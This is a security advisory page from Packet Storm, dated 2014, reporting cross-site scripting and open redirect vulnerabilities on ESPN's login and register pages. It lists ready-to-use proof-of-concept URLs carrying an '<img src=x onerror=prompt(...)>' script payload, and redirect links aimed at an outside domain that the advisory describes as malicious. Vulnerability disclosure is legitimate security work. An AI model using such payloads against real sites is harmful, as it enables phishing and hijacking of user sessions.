what you don't know can hurt you

espn.go.com Cross Site Scripting / Open Redirect

espn.go.com Cross Site Scripting / Open Redirect
Posted Dec 9, 2014
Authored by Jing Wang

espn.go.com suffers from cross site scripting and open redirection vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | b398eae9043b3e998e61be2e17fad219

espn.go.com Cross Site Scripting / Open Redirect

Change Mirror Download
*ESPN espn.go.com <http://espn.go.com/> Login & Register Page XSS and Dest
Redirect Privilege Escalation Security Vulnerabilities*





*Domain:*
http://espn.go.com/


*"*As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States.[2]
<http://en.wikipedia.org/wiki/ESPN#cite_note-2> In addition to the flagship
channel and its seven related channels in the United States, ESPN
broadcasts in more than 200 countries,[3]
<http://en.wikipedia.org/wiki/ESPN#cite_note-ESPN_Inc-3> operating regional
channels in Australia <http://en.wikipedia.org/wiki/Australia>, Brasil
<http://en.wikipedia.org/wiki/Brasil>, Latin America
<http://en.wikipedia.org/wiki/Latin_America> and the United Kingdom
<http://en.wikipedia.org/wiki/United_Kingdom>, and owning a 20% interest in The
Sports Network <http://en.wikipedia.org/wiki/The_Sports_Network> (TSN) as
well as its five sister networks and NHL Network
<http://en.wikipedia.org/wiki/NHL_Network_%28Canada%29> in Canada
<http://en.wikipedia.org/wiki/Canada>." (Wikipedia)






*Vulnerability description:*

Espn.go.com <http://espn.go.com/> has a security problem. It is vulnerable
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open
Redirect) attacks.


Those vulnerabilities are very dangerous. Since they happen at ESPN's
"login" & "register" pages that are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given above, large number of ESPN's
links are vulnerable to those attacks.


The vulnerability occurs at "espn.go.com"'s "login?" & "register" pages
with "redirect" parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459"><img
src=x onerror=prompt('justqdjing')>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn"><img
src=x onerror=prompt('justqdjing')>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate"><img
src=x onerror=prompt('justqdjing')>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login"><img
src=x onerror=prompt('justqdjing')>




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html>




*(2) Dest Redirect Privilege Escalation Vulnerability*

Use one of webpages for the following tests. The webpage address is "
http://www.diebiyi.com/". Suppose that this webpage is malicious.


*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828
<http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828>

*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112
<http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112>

*POC:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com
?



This vulnerability was used to demonstrate "Covert Redirect" of Facebook,

Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms

Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/




*Vulnerable URL 2:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017
<http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017>

*POC:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com





*Vulnerable URL 3:*
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289

POC:
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com





*Poc Video:*
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espn.html
<http://securityrelated.blogspot.sg/2014/12/espn-espn.html>







*(3) *Those security problems were reported to ESPN in early May. However,
they are still unpatched.







Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.
http://www.tetraph.com/wangjing/






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss_9.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html>


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    4 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close